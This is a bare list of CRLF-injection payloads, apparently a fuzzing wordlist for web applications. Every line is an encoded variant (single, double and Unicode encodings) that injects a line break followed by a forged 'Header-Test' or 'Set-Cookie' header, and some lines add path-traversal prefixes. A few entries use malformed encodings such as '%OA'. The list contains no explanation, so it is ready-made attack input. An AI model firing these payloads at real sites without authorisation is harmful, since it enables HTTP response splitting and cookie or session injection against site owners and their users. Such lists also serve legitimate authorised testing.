%0AHeader-Test:crlf_injection
%0A%20Header-Test:crlf_injection
%20%0AHeader-Test:crlf_injection
%23%OAHeader-Test:crlf_injection
%E5%98%8A%E5%98%8DHeader-Test:crlf_injection
%E5%98%8A%E5%98%8D%0AHeader-Test:crlf_injection
%3F%0AHeader-Test:crlf_injection
crlf%0AHeader-Test:crlf_injection
crlf%0A%20Header-Test:crlf_injection
crlf%20%0AHeader-Test:crlf_injection
crlf%23%OAHeader-Test:crlf_injection
crlf%E5%98%8A%E5%98%8DHeader-Test:crlf_injection
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:crlf_injection
crlf%3F%0AHeader-Test:crlf_injection
%0DHeader-Test:crlf_injection
%0D%20Header-Test:crlf_injection
%20%0DHeader-Test:crlf_injection
%23%0DHeader-Test:crlf_injection
%23%0AHeader-Test:crlf_injection
%E5%98%8A%E5%98%8DHeader-Test:crlf_injection
%E5%98%8A%E5%98%8D%0DHeader-Test:crlf_injection
%3F%0DHeader-Test:crlf_injection
crlf%0DHeader-Test:crlf_injection
crlf%0D%20Header-Test:crlf_injection
crlf%20%0DHeader-Test:crlf_injection
crlf%23%0DHeader-Test:crlf_injection
crlf%23%0AHeader-Test:crlf_injection
crlf%E5%98%8A%E5%98%8DHeader-Test:crlf_injection
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:crlf_injection
crlf%3F%0DHeader-Test:crlf_injection
%0D%0AHeader-Test:crlf_injection
%0D%0A%20Header-Test:crlf_injection
%20%0D%0AHeader-Test:crlf_injection
%23%0D%0AHeader-Test:crlf_injection
\r\nHeader-Test:crlf_injection
 \r\n Header-Test:crlf_injection
\r\n Header-Test:crlf_injection
%5cr%5cnHeader-Test:crlf_injection
%E5%98%8A%E5%98%8DHeader-Test:crlf_injection
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:crlf_injection
%3F%0D%0AHeader-Test:crlf_injection
crlf%0D%0AHeader-Test:crlf_injection
crlf%0D%0A%20Header-Test:crlf_injection
crlf%20%0D%0AHeader-Test:crlf_injection
crlf%23%0D%0AHeader-Test:crlf_injection
crlf\r\nHeader-Test:crlf_injection
crlf%5cr%5cnHeader-Test:crlf_injection
crlf%E5%98%8A%E5%98%8DHeader-Test:crlf_injection
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:crlf_injection
crlf%3F%0D%0AHeader-Test:crlf_injection
%0D%0A%09Header-Test:crlf_injection
crlf%0D%0A%09Header-Test:crlf_injection
%250AHeader-Test:crlf_injection
%25250AHeader-Test:crlf_injection
%%0A0AHeader-Test:crlf_injection
%25%30AHeader-Test:crlf_injection
%25%30%61Header-Test:crlf_injection
%u000AHeader-Test:crlf_injection
%%0a0aSet-Cookie:crlf_injection
%0aSet-Cookie:crlf_injection
%0d%0aSet-Cookie:crlf_injection
%0dSet-Cookie:crlf_injection
%23%0aSet-Cookie:crlf_injection
%23%0d%0aSet-Cookie:crlf_injection
%23%0dSet-Cookie:crlf_injection
%25%30%61Set-Cookie:crlf_injection
%25%30aSet-Cookie:crlf_injection
%250aSet-Cookie:crlf_injection
%25250aSet-Cookie:crlf_injection
%2e%2e%2f%0d%0aSet-Cookie:crlf_injection
%2f%2e%2e%0d%0aSet-Cookie:crlf_injection
%2F..%0d%0aSet-Cookie:crlf_injection
%3f%0d%0aSet-Cookie:crlf_injection
%3f%0dSet-Cookie:crlf_injection
%u000aSet-Cookie:crlf_injection